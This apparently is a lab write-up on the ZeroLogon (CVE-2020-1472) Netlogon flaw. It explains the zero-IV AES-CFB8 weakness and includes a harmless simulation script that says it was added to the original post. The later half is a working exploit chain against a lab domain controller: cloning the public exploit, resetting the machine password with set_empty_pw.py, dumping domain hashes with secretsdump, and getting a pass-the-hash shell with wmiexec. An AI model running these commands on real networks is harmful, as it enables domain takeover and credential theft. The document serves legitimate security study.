ZeroLogon Exploit
CVE-2020-1472, 6 Oct 2020
CVE-2020-1472 is a privilege elevation vulnerability in the Netlogon Remote Protocol (MS-NRPC) which Microsoft fixed with the patch KB4565349, released in August 2020.
The vulnerability was discovered by Secura security researcher Tom Tervoort and published on 11 September 2020. The weakness lies in the cipher mode, AES-CFB8 (Advanced Encryption Standard in Cipher Feedback 8-bit mode), which MS-NRPC uses in the third step of its handshake to encrypt the "Client Challenge" into the client credential.
ZeroLogon affected all Windows servers that function as Active Directory domain controllers in enterprise networks.
The following diagram shows the MS-NRPC authentication handshake; the attack happens at step 3, where the client credential is computed by encrypting the client challenge with AES-CFB8.
The way MS-NRPC uses AES-CFB8 has a problem with the Initialisation Vector (IV). The IV should be a random value, but MS-NRPC sets a fixed IV of 16 zero bytes. As a result, if the client challenge is set to all zeros, the encryption result is all zeros with probability 1/256, which makes it easy to pass the validation in step 4.
The attack details can be found in the whitepaper by Tom Tervoort.
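The 1/256 figure follows from how CFB-8 feeds each ciphertext byte back into its shift register. The script below is an added example, not code from the original post or from the exploit repository: it implements CFB-8 over a stand-in block function (HMAC-SHA256 truncated to 16 bytes, playing the role of AES-128's encryption direction, which is the only direction CFB mode ever calls) and measures how often an all-zero 8-byte challenge encrypts to all zeros, once with the fixed zero IV that MS-NRPC used and once with a fresh random IV per session. Session keys and IVs are constructed from a seeded PRNG so the run is reproducible; the function names and the HMAC stand-in are this example's own assumptions.

```python
"""CFB-8 with a fixed all-zero IV: why an all-zero challenge comes out all-zero 1 time in 256.

Added example, not from the original post. HMAC-SHA256 truncated to 16 bytes stands in
for the AES-128 encryption direction: CFB mode only ever calls E_k, never D_k, and the
argument depends only on the mode, so any 16-byte keyed pseudorandom function shows
the same behaviour. Keys and IVs are constructed from a seeded PRNG (reproducible).
"""
import hashlib
import hmac
import random

BLOCK_SIZE = 16
ZERO_IV = bytes(BLOCK_SIZE)          # the fixed IV MS-NRPC used: 16 zero bytes
CHALLENGE_LEN = 8                    # an MS-NRPC credential is 8 bytes


def block_encrypt(key: bytes, block: bytes) -> bytes:
    """Stand-in for AES-128 E_k: a keyed PRF from a 16-byte block to 16 bytes."""
    assert len(block) == BLOCK_SIZE
    return hmac.new(key, block, hashlib.sha256).digest()[:BLOCK_SIZE]


def cfb8_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """CFB-8: one plaintext byte per block call; each ciphertext byte is shifted into
    the register, so the state only changes when the ciphertext bytes do."""
    register = bytearray(iv)
    out = bytearray()
    for p in plaintext:
        keystream_byte = block_encrypt(key, bytes(register))[0]
        c = p ^ keystream_byte
        out.append(c)
        register = register[1:] + bytes([c])   # drop the oldest byte, append the new ciphertext byte
    return bytes(out)


def first_keystream_byte_is_zero(key: bytes) -> bool:
    """With the zero IV the first keystream byte is E_k(0^16)[0]. If that byte is 0 the
    ciphertext byte is 0, the register stays all-zero, and every later keystream byte
    is the very same 0: the whole credential collapses to zeros."""
    return block_encrypt(key, ZERO_IV)[0] == 0


def zero_challenge_result(key: bytes, iv: bytes = ZERO_IV) -> bytes:
    """Encrypt an all-zero client challenge under a session key and IV."""
    return cfb8_encrypt(key, iv, bytes(CHALLENGE_LEN))


def _random_key_and_iv(rng: random.Random, fixed_zero_iv: bool):
    key = rng.getrandbits(128).to_bytes(16, "big")          # constructed session key
    iv = ZERO_IV if fixed_zero_iv else rng.getrandbits(128).to_bytes(16, "big")
    return key, iv


def all_zero_fraction(trials: int, seed: int = 2020, fixed_zero_iv: bool = True) -> float:
    """Fraction of constructed session keys for which the all-zero challenge encrypts to
    all zeros. Fixed zero IV: about 1/256. Random IV: the register never gets stuck, so
    all 8 keystream bytes must independently be 0, about 2**-64 (never seen in practice)."""
    rng = random.Random(seed)
    hits = 0
    for _ in range(trials):
        key, iv = _random_key_and_iv(rng, fixed_zero_iv)
        if zero_challenge_result(key, iv) == bytes(CHALLENGE_LEN):
            hits += 1
    return hits / trials


def equivalence_holds(trials: int, seed: int = 1) -> bool:
    """Exact check of the argument above: under the zero IV, the credential is all zeros
    if and only if the first keystream byte is zero."""
    rng = random.Random(seed)
    for _ in range(trials):
        key, _ = _random_key_and_iv(rng, fixed_zero_iv=True)
        collapsed = zero_challenge_result(key) == bytes(CHALLENGE_LEN)
        if collapsed != first_keystream_byte_is_zero(key):
            return False
    return True


if __name__ == "__main__":
    print("fixed zero IV :", all_zero_fraction(10_000, fixed_zero_iv=True))   # about 1/256 = 0.0039
    print("random IV     :", all_zero_fraction(10_000, fixed_zero_iv=False))  # 0.0 in any feasible sample
    print("equivalence   :", equivalence_holds(2_000))
```

The comparison is the whole lesson: the cipher is fine, the mode is fine, but the fixed zero IV combined with a plaintext the peer controls turns a 2^-64 event into a 2^-8 one that can be retried per session. On the defending side this is exactly why the KB4565349 change, which enforces secure RPC and rejects the weak handshake, closes the hole regardless of the cipher mode.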

Host Name: FKCLAI-WIN2016
OS Name: Microsoft Windows Server 2016 Standard
OS Version: 10.0.14393 N/A Build 14393
Domain: FKCLAI.local
Logon Server: \\FKCLAI-WIN2016

root@kclai:~/Documents/ctf/expoit# git clone https://github.com/risksense/zerologon.git
Cloning into 'zerologon'...
remote: Enumerating objects: 22, done.
remote: Counting objects: 100% (22/22), done.
remote: Compressing objects: 100% (15/15), done.
remote: Total 22 (delta 11), reused 18 (delta 7), pack-reused 0
Unpacking objects: 100% (22/22), done.
root@kclai:~/Documents/ctf/expoit#
Remove the distribution's impacket packages first:
root@kclai:~/Documents/ctf/expoit/zerologon# apt remove --purge impacket-scripts python3-impacket
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following packages were automatically installed and are no longer required:
automater bdfproxy blindelephant couchdb creddump deblaze dh-python dnmap
erlang17-asn1 erlang17-base erlang17-crypto erlang17-eunit erlang17-inets
erlang17-mnesia erlang17-os-mon erlang17-public-key erlang17-runtime-tools
erlang17-snmp erlang17-ssl erlang17-syntax-tools erlang17-tools erlang17-webtool
erlang17-xmerl fimap findmyhash funkload gconf-service gconf2-common
ghost-phisher gir1.2-clutter-gst-3.0 gir1.2-gtkclutter-1.0 gir1.2-mutter-2
gir1.2-mutter-3 giskismet glusterfs-common gnome-theme-kali grabber
guile-2.0-libs gvfs-bin hexorbase intersect irqbalance jad kali-desktop-common
keimpx libacl1-dev libadns1 libarmadillo8 libasan4 libattr1-dev libavahi-gobject0
libayatana-ido3-0.4-0 libbfio1 libbind9-160 libboost-atomic1.62.0
libboost-chrono1.62.0 libboost-date-time1.62.0 libboost-filesystem1.62.0
libboost-iostreams1.62.0 libboost-program-options1.67.0 libboost-random1.62.0
libboost-serialization1.67.0 libboost-system1.62.0 libboost-test1.67.0
Get the latest impacket from https://github.com/SecureAuthCorp/impacket.git:
root@kclai:~/Documents/ctf/tools/win# git clone https://github.com/SecureAuthCorp/impacket.git
Cloning into 'impacket'...
remote: Enumerating objects: 18598, done.
remote: Total 18598 (delta 0), reused 0 (delta 0), pack-reused 18598
Receiving objects: 100% (18598/18598), 6.17 MiB | 1.62 MiB/s, done.
Resolving deltas: 100% (14169/14169), done.
root@kclai:~/Documents/ctf/tools/win/impacket# python setup.py install
running install
running bdist_egg
running egg_info
creating impacket.egg-info
writing requirements to impacket.egg-info/requires.txt
writing impacket.egg-info/PKG-INFO
writing top-level names to impacket.egg-info/top_level.txt
writing dependency_links to impacket.egg-info/dependency_links.txt
writing manifest file 'impacket.egg-info/SOURCES.txt'
reading manifest file 'impacket.egg-info/SOURCES.txt'
reading manifest template 'MANIFEST.in'
warning: no files found matching 'tests' under directory 'examples'
warning: no files found matching '*.txt' under directory 'examples'
writing manife
..
..
..
... dding ldapdomaindump 0.9.1 to easy-install.pth file
Using /usr/lib/python3/dist-packages
Searching for ldap3==2.5.1
Best match: ldap3 2.5.1
Adding ldap3 2.5.1 to easy-install.pth file
Using /usr/lib/python3/dist-packages
Searching for Flask==1.1.1
Best match: Flask 1.1.1
Adding Flask 1.1.1 to easy-install.pth file
Installing flask script to /usr/local/bin
Using /usr/lib/python3/dist-packages
Finished processing dependencies for impacket==0.9.22.dev1+20200929.152157.fe642b24
root@kclai:~/Documents/ctf/tools/win/impacket#
python3 set_empty_pw.py fkclai-win2016 192.168.1.169

secretsdump.py -just-dc administrator/fkclai-win2016\[email protected]

wmiexec.py fkclai/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42
